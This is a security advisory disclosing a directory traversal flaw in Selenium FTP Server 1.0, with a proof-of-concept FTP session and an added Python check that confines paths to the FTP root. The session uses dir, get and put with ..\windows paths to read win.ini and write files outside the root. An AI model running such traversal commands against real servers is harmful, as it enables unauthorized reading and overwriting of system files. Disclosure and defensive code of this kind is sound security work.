[NT] Selenium FTP Server Directory Traversal



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



Selenium FTP Server Directory Traversal
------------------------------------------------------------------------


SUMMARY

<http://bibasoftware.com/?page_id=15> Selenium FTP Server is vulnerable
to a directory traversal caused by an input validation error. A remote
unauthenticated user can use the DIR, LIST, NLST, etc. commands to
display any file on the remote server, use the GET/RECV command to
retrieve any file outside the FTP root, and use the PUT/SEND command to
write to any location on the remote server.

DETAILS

Vulnerable Systems:
* Selenium FTP Server version 1.0

Proof of concept:
C:\LinaresExploits\>ftp localhost
Connected to GregL-WS.
220 Selenium Server FTP (http://bibasoftware.com)
User (GregL-WS:(none)):
331 Password required for .
Password:
230 User logged in.
ftp> dir \windows
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Nov 14 15:53 WINDOWS
226 File sent ok
ftp: 63 bytes received in 0.02Seconds 3.94Kbytes/sec.
ftp> dir \windows\*.exe
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx 1 ftp ftp 68096 May 02 2005 agrsmdel.exe
-rwxrwxrwx 1 ftp ftp 44544 Jun 02 1998 clspack.exe
-rwxrwxrwx 1 ftp ftp 1032192 Aug 04 2004 explorer.exe
-rwxrwxrwx 1 ftp ftp 10752 May 26 2005 hh.exe
-rwxrwxrwx 1 ftp ftp 306688 Oct 29 1998 IsUninst.exe
-rwxrwxrwx 1 ftp ftp 112640 Jul 01 2001 lsb_un20.exe
-rwxrwxrwx 1 ftp ftp 69120 Aug 04 2004 notepad.exe
-rwxrwxrwx 1 ftp ftp 69120 Aug 04 2004 notepad1.exe
-rwxrwxrwx 1 ftp ftp 146432 Aug 04 2004 regedit.exe
-rwxrwxrwx 1 ftp ftp 46352 Feb 28 2003 setdebug.exe
-rwxrwxrwx 1 ftp ftp 286720 Sep 07 14:10 Setup1.exe
-rwxrwxrwx 1 ftp ftp 32866 Aug 04 2004 slrundll.exe
-rwxrwxrwx 1 ftp ftp 46592 Aug 02 2002 SOUNDMAN.EXE
-rwxrwxrwx 1 ftp ftp 73216 Sep 07 14:10 ST6UNST.EXE
-rwxrwxrwx 1 ftp ftp 15360 Aug 04 2004 taskman.exe
-rwxrwxrwx 1 ftp ftp 90624 Oct 27 13:22 tsuninst1.exe
-rwxrwxrwx 1 ftp ftp 49680 Aug 04 2004 twunk_16.exe
-rwxrwxrwx 1 ftp ftp 25600 Aug 04 2004 twunk_32.exe
-rwxrwxrwx 1 ftp ftp 299520 Mar 23 1999 uninst.exe
-rwxrwxrwx 1 ftp ftp 107134 Apr 04 08:06 UninstallFirefox.exe
-rwxrwxrwx 1 ftp ftp 86016 Dec 17 1999 unvise32.exe
-rwxrwxrwx 1 ftp ftp 256192 Aug 04 2004 winhelp.exe
-rwxrwxrwx 1 ftp ftp 283648 Aug 04 2004 winhlp32.exe
226 File sent ok
ftp: 1557 bytes received in 0.03Seconds 50.23Kbytes/sec.
ftp> get ..\windows\win.ini C:\mine.txt
200 Port command successful.
150 Opening data connection for ..\windows\win.ini.
226 File sent ok
ftp: 1039 bytes received in 0.00Seconds 1039000.00Kbytes/sec.
ftp> put C:\mine.txt ..\windows\toobad.txt
200 Port command successful.
150 Opening data connection for ..\windows\toobad.txt.
226 File received ok
ftp: 1039 bytes sent in 0.00Seconds 1039000.00Kbytes/sec.
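
The transcript shows the server passing the client's path argument straight to the file system. The check below is an added example, not code from the advisory or from the vendor: it maps each argument to a path confined to the FTP root and rejects anything that escapes it. The root C:\ftproot and all function names are assumptions made for illustration.

```python
import ntpath  # Windows path rules, usable on any OS

FTP_ROOT = r"C:\ftproot"  # assumed root directory; the advisory does not name one


class PathEscape(Exception):
    """Client-supplied path would resolve outside the FTP root."""


def resolve_in_root(root, cwd, client_path):
    """Map an FTP path argument to a local path confined to `root`.

    `cwd` is the session's virtual directory ("\\" is the FTP root).
    """
    # NUL truncates paths in native APIs; ':' covers drive letters
    # and NTFS alternate data streams.
    if "\x00" in client_path or ":" in client_path:
        raise PathEscape(client_path)
    path = client_path.replace("/", "\\")  # Windows accepts both separators
    # A leading separator means "FTP root", never "root of the drive".
    virtual = path if path.startswith("\\") else ntpath.join(cwd, path)
    # Anchor under the root first, then collapse "." and ".." lexically.
    candidate = ntpath.normpath(ntpath.join(root, virtual.lstrip("\\")))
    base = ntpath.normcase(ntpath.normpath(root))
    probe = ntpath.normcase(candidate)
    # Compare whole components so C:\ftproot2 does not pass as C:\ftproot.
    if probe != base and not probe.startswith(base + "\\"):
        raise PathEscape(client_path)
    # On a real server, also resolve links and junctions (os.path.realpath)
    # and repeat the containment check before opening the file.
    return candidate


def is_allowed(client_path, cwd="\\", root=FTP_ROOT):
    """True if the argument stays inside the root, False if it escapes."""
    try:
        resolve_in_root(root, cwd, client_path)
        return True
    except PathEscape:
        return False


if __name__ == "__main__":
    # Arguments taken from the transcript above, plus one in-root path.
    for arg in [r"\windows", r"\windows\*.exe", r"..\windows\win.ini",
                r"..\windows\toobad.txt", r"C:\mine.txt", r"pub\readme.txt"]:
        print(f"{arg!r:28} -> {'allow' if is_allowed(arg) else 'deny'}")
```

With this check, \windows is accepted but resolves to C:\ftproot\windows rather than the system directory, while the ..\windows arguments used with get and put are refused.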

Furthermore, the software improperly writes any username/password that
might be used to log in to the program in plaintext to the file[s] stored
in the default directory of C:\Program Files\BiBa SOFTWARE\Selenium
Server\Servers.


ADDITIONAL INFORMATION

The information has been provided by <mailto:glinares.code@xxxxxxxxx>
Greg Linares.


